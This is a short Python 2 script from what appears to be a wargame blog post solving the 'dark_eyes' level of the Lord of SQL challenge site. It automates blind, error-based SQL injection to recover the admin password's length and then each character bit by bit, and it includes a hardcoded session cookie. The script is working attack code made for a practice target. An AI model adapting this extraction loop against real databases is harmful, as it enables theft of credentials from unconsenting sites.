import urllib2
def request(data):
url = "https://los.eagle-jump.org/dark_eyes_a7f01583a2ab681dc71e5fd3a40c0bd4.php?pw="+urllib2.quote(data)
req = urllib2.Request(url)
req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
req.add_header('Cookie','__cfduid=dc3f1581bf2ce11c70afbb877548363c31517875851; PHPSESSID=lua2edl01o0446vgm61mr0dar6')
response = urllib2.urlopen(req).read()
if "addslashes" in str(response):
return True
else:
return False
length = 0
admin_pw = ""
binary = ""
for i in range(0,100):
payload = "' or 1=1 and id='admin' and 1=(select "+str(i)+" in (length(pw),(select 1 union select 2)))#"
if request(payload)==True:
length = i
break
print "[*]Admin Password Length = " + str(length)
for j in range(1,length+1):
binary = ""
for i in range(1,9):
payload = "' or id='admin' and 1=(select 1 in (substring(lpad(bin(ord(substring(pw,"+str(j)+",1))),8,0),"+str(i)+",1),(select 1 union select 2)))#"
if request(payload)==True:
binary += "1"
else:
binary += "0"
admin_pw += chr(int(binary,2))
print "[-]Admin Password = " + admin_pw
print "[*]Admin Password = " + admin_pw
'Wargame > Lord of SQL' 카테고리의 다른 글
| LOS evil_wizard (0) | 2018.02.09 |
|---|---|
| LOS hell_fire (0) | 2018.02.09 |
| LOS iron_golem (0) | 2018.02.08 |
| LOS dragon (0) | 2018.02.08 |
| LOS xavis (0) | 2018.02.08 |
JeonYoungSin
메모 기록용 공간